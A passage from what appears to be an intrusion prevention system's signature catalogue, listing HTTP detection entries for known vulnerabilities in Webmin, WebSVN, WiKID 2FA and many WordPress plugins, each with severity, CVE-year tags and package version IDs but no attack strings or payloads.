Context: HTTP Normalized Request-Line
Severity: 7
Tags: Unix, Linux, Any Hardware, Webmin, CVE2022, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1525-5242
Last changed: sgpkg-ips-1525-5242
Vulnerability: Webmin-File-Manager-RCE
Description:
Back to top

HTTP_CRL-Webmin-Package-Updates-Remote-Command-Execution

About this situation: An attempt to exploit a vulnerability in Webmin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Webmin, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1194-5242
Last changed: sgpkg-ips-1499-5242
Vulnerability: Webmin-Package-Updates-Remote-Command-Execution
Description:
Back to top

HTTP_CRL-Webmin-Show.cgi-Command-Execution

About this situation: An attempt to exploit a vulnerability in Webmin Webmin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Webmin, CVE2012, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-493-5211
Last changed: sgpkg-ips-1607-5242
Vulnerability: Webmin-Show.cgi-Command-Execution
Description:
Back to top

HTTP_CRL-Websendmail-Cgi-System-Compromise

About this situation: Vulnerable websendmail script accessed
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WebGAIS, CVE1999, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-4-1102
Last changed: sgpkg-ips-640-5211
Vulnerability: HTTP-Websendmail-Cgi-System-Compromise
Description:
Back to top

HTTP_CRL-Webstore-Ws-Mail-Cgi-System-Compromise

About this situation: Vulnerable ws_mail.cgi script accessed
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, cgiCentral WebStore 400, CVE2001, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-3-1102
Last changed: sgpkg-ips-514-5211
Vulnerability: HTTP-Webstore-Ws-Mail-Cgi-System-Compromise
Description:
Back to top

HTTP_CRL-Websvn-Search-Command-Injection

About this situation: An attempt to exploit a vulnerability in WebSVN WebSVN detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WebSVN, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1371-5242
Last changed: sgpkg-ips-1388-5242
Vulnerability: Websvn-Search-Command-Injection
Description:
Back to top

HTTP_CRL-Webui-Mainfile.php-Arbitrary-Command-Injection

About this situation: An attempt to exploit a vulnerability in WebUI WebUI detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WebUI, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-657-5211
Last changed: sgpkg-ips-657-5211
Vulnerability: Webui-Mainfile.php-Arbitrary-Command-Injection
Description:
Back to top

HTTP_CRL-WePresent-WiPG-1000-Command-Injection

About this situation: An attempt to exploit a WePresent WiPG-1000 Command Injection vulnerability detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Unix, Any Hardware, WePresent, Unix not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-980-5242
Last changed: sgpkg-ips-1010-5242
Vulnerability: WePresent-WiPG-1000-Command-Injection
Description:
Back to top

HTTP_CRL-Werkzeug-Debugger-Remote-Code-Execution

About this situation: An attempt to exploit a server using Werkzeug Debugger detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-694-5211
Vulnerability: Werkzeug-Debugger-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-West-Wind-Web-Connection-Multiple-Vulnerabilities

About this situation: An attempt to exploit a vulnerability in West Wind Web Connection detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-684-5211
Last changed: sgpkg-ips-684-5211
Description:
Back to top

HTTP_CRL-Western-Digital-MyCloud-Multi_uploadify-File-Upload-Vulnerability

About this situation: A Western Digital MyCloud multi_uploadify File Upload vulnerability
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, WD My Cloud NAS, CVE2017, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1044-5242
Last changed: sgpkg-ips-1044-5242
Vulnerability: Western-Digital-MyCloud-Multi_uploadify-File-Upload-Vulnerability
Description:
Back to top

HTTP_CRL-Whois-Raw-Cgi-System-Compromise

About this situation: Vulnerable whois_raw.cgi accessed
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, CDomain CDomainfree, CVE1999, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-3-1102
Last changed: sgpkg-ips-507-5211
Vulnerability: HTTP-Whois-Raw-Cgi-System-Compromise
Description:
Back to top

HTTP_CRL-WIKID-2fa-Enterprise-Server-Groups.jsp-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in WiKID 2FA Enterprise Server detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WiKID 2FA Enterprise Server, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1232-5242
Last changed: sgpkg-ips-1232-5242
Vulnerability: WIKID-2fa-Enterprise-Server-Groups.jsp-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-WIKID-2fa-Enterprise-Server-InitDevice-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in WiKID 2FA Enterprise Server detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WiKID 2FA Enterprise Server, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1211-5242
Last changed: sgpkg-ips-1211-5242
Vulnerability: WIKID-2fa-Enterprise-Server-InitDevice-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-WIKID-2fa-Enterprise-Server-Log.jsp-SQL-Injection

About this situation: A vulnerability in WiKID 2FA Enterprise Server detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WiKID 2FA Enterprise Server, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1206-5242
Last changed: sgpkg-ips-1206-5242
Vulnerability: WIKID-2fa-Enterprise-Server-Log.jsp-SQL-Injection
Description:
Back to top

HTTP_CRL-WIKID-2fa-Enterprise-Server-Preregister-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in WiKID 2FA Enterprise Server detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WiKID 2FA Enterprise Server, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1213-5242
Last changed: sgpkg-ips-1503-5242
Vulnerability: WIKID-2fa-Enterprise-Server-Preregister-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-WIKID-2fa-Enterprise-Server-Processpref.jsp-SQL-Injection

About this situation: An attempt to exploit a vulnerability in WiKID 2FA Enterprise Server detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WiKID 2FA Enterprise Server, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1202-5242
Last changed: sgpkg-ips-1202-5242
Vulnerability: WIKID-2fa-Enterprise-Server-Processpref.jsp-SQL-Injection
Description:
Back to top

HTTP_CRL-WIKID-2fa-Enterprise-Server-Searchdevices.jsp-SQL-Injection

About this situation: An attempt to exploit a vulnerability in WiKID 2FA Enterprise Server detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WiKID 2FA Enterprise Server, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1200-5242
Last changed: sgpkg-ips-1200-5242
Vulnerability: WIKID-2fa-Enterprise-Server-Searchdevices.jsp-SQL-Injection
Description:
Back to top

HTTP_CRL-Wintr-Web-Project-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Wintr Web Project detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Wintr Web Project, Any Operating System not specific, Disclosure, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-926-5242
Vulnerability: Wintr-Web-Project-SQL-Injection
Description:
Back to top

HTTP_CRL-Winwebsec-Botnet-Request

About this situation: A suspicious request have been made
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-556-5211
Last changed: sgpkg-ips-556-5211
Vulnerability: Winwebsec-Botnet
Description:
Back to top

HTTP_CRL-Wordpress-10Web-Photo-Gallery-Plugin-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in WordPress 10Web Photo Gallery Plugin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress 10Web Photo Gallery Plugin, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1233-5242
Last changed: sgpkg-ips-1233-5242
Vulnerability: Wordpress-10Web-Photo-Gallery-Plugin-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Wordpress-Admin-API-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in WordPress Project WordPress detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, WordPress, CVE2016, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-797-5211
Last changed: sgpkg-ips-1758-5242
Vulnerability: Wordpress-Admin-API-Directory-Traversal
Description:
Back to top

HTTP_CRL-Wordpress-Advanced-Custom-Fields-Plugin-Post_Status-Reflected-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in WordPress Project Advanced Custom Fields Plugin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1596-5242
Last changed: sgpkg-ips-1596-5242
Vulnerability: Wordpress-Advanced-Custom-Fields-Plugin-Post_Status-Reflected-XSS
Description:
Back to top

HTTP_CRL-Wordpress-All-In-One-Wp-Migration-Plugin-Backups-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in WordPress Project All-in-One WP Migration detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1471-5242
Last changed: sgpkg-ips-1471-5242
Vulnerability: Wordpress-All-In-One-Wp-Migration-Plugin-Backups-Directory-Traversal
Description:
Back to top

HTTP_CRL-Wordpress-Arbitrary-File-Deletion

About this situation: An attempt to exploit a vulnerability in Wordpress detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1156-5242
Last changed: sgpkg-ips-1156-5242
Vulnerability: Wordpress-Arbitrary-File-Deletion
Description:
Back to top

HTTP_CRL-Wordpress-Automatic-Plugin-SQL-Injection-CVE-2024-27956

About this situation: An attempt to exploit a vulnerability in WordPress Automatic Plugin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1728-5242
Last changed: sgpkg-ips-1805-5242
Vulnerability: Wordpress-Automatic-Plugin-SQL-Injection-CVE-2024-27956
Description:
Back to top

HTTP_CRL-Wordpress-AYS-Popup-Box-Plugin-Class-AYS-Pb-Admin-Reflected-XSS

About this situation: An attempt to exploit a vulnerability in WordPress Project AYS Popup Box detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress Project AYS Popup Box, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1648-5242
Last changed: sgpkg-ips-1758-5242
Vulnerability: Wordpress-AYS-Popup-Box-Plugin-Class-AYS-Pb-Admin-Reflected-XSS
Description:
Back to top

HTTP_CRL-Wordpress-Backuply-Plugin-Options-SQL-Injection

About this situation: An attempt to exploit a vulnerability in WordPress Project Backuply Plugin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress Project Backuply Plugin, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1786-5242
Last changed: sgpkg-ips-1786-5242
Vulnerability: Wordpress-Backuply-Plugin-Options-SQL-Injection
Description:
Back to top

HTTP_CRL-Wordpress-Beautiful-Cookie-Consent-Banner-Plugin-CVE-2023-3388-Stored-XSS

About this situation: An attempt to exploit a vulnerability in WordPress Project Beautiful Cookie Consent Banner Plugin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1610-5242
Last changed: sgpkg-ips-1610-5242
Vulnerability: Wordpress-Beautiful-Cookie-Consent-Banner-Plugin-CVE-2023-3388-Stored-XSS
Description:
Back to top

HTTP_CRL-Wordpress-Better-Search-Replace-Plugin-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in WordPress Better Search Replace plugin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1701-5242
Last changed: sgpkg-ips-1701-5242
Vulnerability: Wordpress-Better-Search-Replace-Plugin-Insecure-Deserialization
Description:
Back to top

HTTP_CRL-Wordpress-Better-Search-Replace-Plugin-Potential-Insecure-Deserialization

About this situation: A potential attempt to exploit a vulnerability in WordPress Better Search Replace plugin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2023, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1701-5242
Last changed: sgpkg-ips-1782-5242
Vulnerability: Wordpress-Better-Search-Replace-Plugin-Insecure-Deserialization
Description:
Back to top

HTTP_CRL-Wordpress-BookingPress-SQLi

About this situation: An attempt to exploit a vulnerability in the Wordpress BookingPress Plugin detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress BookingPress Plugin, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1552-5242
Last changed: sgpkg-ips-1552-5242
Vulnerability: Wordpress-BookingPress-SQLi
Description:
Back to top

HTTP_CRL-Wordpress-C-Library-Gethostbyname-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in GNU C Library Project GNU C Library detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, glibc, CVE2015, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1060-5242
Last changed: sgpkg-ips-1060-5242
Vulnerability: Wordpress-C-Library-Gethostbyname-Buffer-Overflow
Description:
Back to top

HTTP_CRL-Wordpress-Calculated-Fields-Form-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in WordPress Project Calculated Fields Form plugin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1253-5242
Last changed: sgpkg-ips-1253-5242
Vulnerability: Wordpress-Calculated-Fields-Form-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Wordpress-Comments-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in WordPress detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, WordPress, CVE2015, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-647-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: Wordpress-Comments-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Wordpress-Compfight-1.4-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in WordPress detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-600-5211
Vulnerability: Wordpress-Compfight-1.4-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Wordpress-Core-Avatar-Block-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in WordPress Project WordPress detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1730-5242
Last changed: sgpkg-ips-1730-5242
Vulnerability: Wordpress-Core-Avatar-Block-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Wordpress-Core-Post-Slug-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in WordPress Project WordPress detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1430-5242
Last changed: sgpkg-ips-1748-5242
Vulnerability: Wordpress-Core-Post-Slug-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Wordpress-Database-Backup-RCE

About this situation: An attempt to exploit a vulnerability in WordPress detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1196-5242
Last changed: sgpkg-ips-1196-5242
Vulnerability: Wordpress-Database-Backup-RCE
Description:
Back to top

HTTP_CRL-Wordpress-Download-Manager-Plugin-Attach-File-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in WordPress Project Download Manager Plugin for WordPress detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1419-5242
Last changed: sgpkg-ips-1419-5242
Vulnerability: Wordpress-Download-Manager-Plugin-Attach-File-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Wordpress-Download-Monitor-Plugin-Post_Title-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in WordPress Project Download Monitor Plugin for WordPress detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1440-5242
Last changed: sgpkg-ips-1440-5242
Vulnerability: Wordpress-Download-Monitor-Plugin-Post_Title-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Wordpress-EasyCart-Plugin-Privilege-Escalation

About this situation: An attempt to exploit a Wordpress EasyCart Plugin Privilege Escalation vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, WordPress EasyCart, CVE2015, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-685-5211
Last changed: sgpkg-ips-1758-5242
Vulnerability: Wordpress-EasyCart-Plugin-Privilege-Escalation
Description:
Back to top

HTTP_CRL-Wordpress-Events-Made-Easy-Plugin-Lang-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Wordpress Project Events Made Easy detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1486-5242
Last changed: sgpkg-ips-1486-5242
Vulnerability: Wordpress-Events-Made-Easy-Plugin-Lang-SQL-Injection
Description:
Back to top

HTTP_CRL-Wordpress-File-Manager-Plugin-RCE-CVE-2020-25213

About this situation: An attempt to exploit a vulnerability in Wordpress File Manager Plugin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress File Manager Plugin, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1276-5242
Last changed: sgpkg-ips-1276-5242
Vulnerability: Wordpress-File-Manager-Plugin-RCE-CVE-2020-25213
Description:
Back to top

HTTP_CRL-Wordpress-Forminator-Plugin-SQL-Injection

About this situation: An attempt to exploit a vulnerability in WordPress Project Forminator Plugin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress Project Forminator Plugin, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1733-5242
Last changed: sgpkg-ips-1733-5242
Vulnerability: Wordpress-Forminator-Plugin-SQL-Injection
Description:
Back to top

HTTP_CRL-Wordpress-GDPR-Cookie-Consent-Plugin-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Webtoffee GDPR Cookie Consent Plugin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1226-5242
Last changed: sgpkg-ips-1501-5242
Vulnerability: Wordpress-GDPR-Cookie-Consent-Plugin-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Wordpress-Hash-Form-Plugin-RCE

About this situation: An attempt to exploit a vulnerability in the WordPress Hash Form plugin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Linux, Any Hardware, WordPress Hash Form Plugin, CVE2024, Windows not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1742-5242
Last changed: sgpkg-ips-1758-5242
Vulnerability: Wordpress-Hash-Form-Plugin-RCE
Description:
Back to top

HTTP_CRL-Wordpress-Husky-Products-Filter-Plugin-Local-File-Inclusion-CVE-2025-1661

About this situation: An attempt to exploit a vulnerability in WordPress Project Husky Products Filter Plugin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress Project Husky Products Filter Plugin, CVE2025, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic, 4th Most Recent Update, 5th Most Recent Update
First detected in: sgpkg-ips-1870-5242
Last changed: sgpkg-ips-1870-5242
Vulnerability: Wordpress-Husky-Products-Filter-Plugin-Local-File-Inclusion-CVE-2025-1661
Description:
Back to top

HTTP_CRL-Wordpress-Husky-Products-Filter-Plugin-Woof_Author-SQL-Injection

About this situation: An attempt to exploit a vulnerability in WordPress Project Husky Products Filter Plugin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress Project Husky Products Filter Plugin, CVE2024, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1768-5242
Last changed: sgpkg-ips-1836-5242
Vulnerability: Wordpress-Husky-Products-Filter-Plugin-Woof_Author-SQL-Injection
Description:
Back to top

HTTP_CRL-Wordpress-InfiniteWP-Client-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in WordPress InfiniteWP detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress InfiniteWP, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1224-5242
Last changed: sgpkg-ips-1758-5242
Vulnerability: Wordpress-InfiniteWP-Client-Authentication-Bypass
Description:
Back to top

HTTP_CRL-Wordpress-Infusionsoft-Gravity-Forms-PHP-Upload

About this situation: An attempt to exploit a Wordpress Infusionsoft Gravity Forms PHP Upload vulnerability.
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Wordpress Infusionsoft Gravity Forms, CVE2014, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-696-5211
Last changed: sgpkg-ips-1776-5242
Vulnerability: Wordpress-Infusionsoft-Gravity-Forms-PHP-Upload
Description:
Back to top

HTTP_CRL-Wordpress-Ketchup-Restaurant-Reservations-Plugin-Data-XSS

About this situation: An attempt to exploit a vulnerability in WordPress Project Ketchup Restaurant Reservations Plugin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1518-5242
Last changed: sgpkg-ips-1518-5242
Vulnerability: Wordpress-Ketchup-Restaurant-Reservations-Plugin-Data-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Wordpress-Ketchup-Restaurant-Reservations-Plugin-SQL-Injection

About this situation: An attempt to exploit a vulnerability in WordPress Project Ketchup Restaurant Reservations Plugin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1511-5242
Last changed: sgpkg-ips-1511-5242
Vulnerability: Wordpress-Ketchup-Restaurant-Reservations-Plugin-SQL-Injection
Description:
Back to top

HTTP_CRL-Wordpress-KingComposer-Plugin-Reflected-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in WordPress KingComposer plugin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1365-5242
Last changed: sgpkg-ips-1365-5242
Vulnerability: Wordpress-KingComposer-Plugin-Reflected-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Wordpress-Layerslider-Plugin-SQL-Injection-CVE-2024-2879

About this situation: An attempt to exploit a vulnerability in WordPress LayerSlider plugin detected
Context: HTTP Normalized Request-Line
